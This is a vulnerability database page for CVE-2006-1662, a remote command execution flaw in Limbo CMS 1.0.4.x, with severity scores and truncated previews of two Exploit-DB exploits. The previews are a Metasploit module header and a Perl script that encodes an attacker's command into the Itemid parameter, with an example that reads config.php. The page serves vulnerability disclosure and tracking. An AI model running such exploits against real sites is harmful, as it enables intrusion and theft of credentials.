CVE-2006-1662
published 2006-04-07CVE-2006-1662: The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.28%
86.9th percentile
The frontpage option in Limbo CMS 1.0.4.2 and 1.0.4.1 allows remote attackers to execute arbitrary PHP commands via the Itemid parameter in index.php.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| limbo_cms | limbo_cms | — | — |
| limbo_cms | limbo_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)
exploitdb·2006-03-07
CVE-2006-1662 Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)
---
##
# Title: Limbo CMS version 1.x suffers from a remote code execution vulnerability.
# Name: limbo_cms_1_x.pm
# License: Artistic/BSD/GPL
# Info: Trying to get the command execution exploits out of the way on milw0rm.com. M's are always good.
#
#
# - This is an exploit module for the Metasploit Framework, please see
# http://metasploit.com/projects/Framework for more information.
##
package Msf::Exploit::limbo_cms_1_x;
use base "Msf::Exploit";
use strict;
use Pex::Text;
use bytes;
my $advanced = { };
my $info = {
'Name' => 'Limbo CMS version 1.x Code Execution',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'sirh0t ' ],
'Arch' => [ ],
'OS' => [ ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target addr
Exploit-DB
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution
exploitdb·2006-03-01
CVE-2006-1662 Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution
Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution
---
#!/usr/bin/perl
##
## Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit
## Bug Discovered by: Coloss / Epsilon (advance1[at]gmail.com) http://coded.altervista.org/limbophp.pl
## /str0ke (milw0rm.com)
use LWP::Simple;
$serv = $ARGV[0];
$path = $ARGV[1];
$command = $ARGV[2];
$cmd = "echo start_er;".
"$command;".
"echo end_er";
my $byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
sub usage
{
print "Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit /str0ke (milw0rm.com)";
print "Usage: $0 www.example.com /directory/ \"cat config.php\"\n";
print "sever - URL\n";
print "path - path to limbo\n";
print "command - command to execute\n";
exit ();
}
sub exploit
{
print qq(Limbo CMS <= 1.0.4.2 (ItemID) Re
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0728.htmlhttp://securityreason.com/securityalert/519http://www.securityfocus.com/archive/1/426428http://www.securityfocus.com/archive/1/429946/100/0/threadedhttp://www.securityfocus.com/bid/16902https://exchange.xforce.ibmcloud.com/vulnerabilities/24992http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0728.htmlhttp://securityreason.com/securityalert/519http://www.securityfocus.com/archive/1/426428http://www.securityfocus.com/archive/1/429946/100/0/threadedhttp://www.securityfocus.com/bid/16902https://exchange.xforce.ibmcloud.com/vulnerabilities/24992
2006-04-07
Published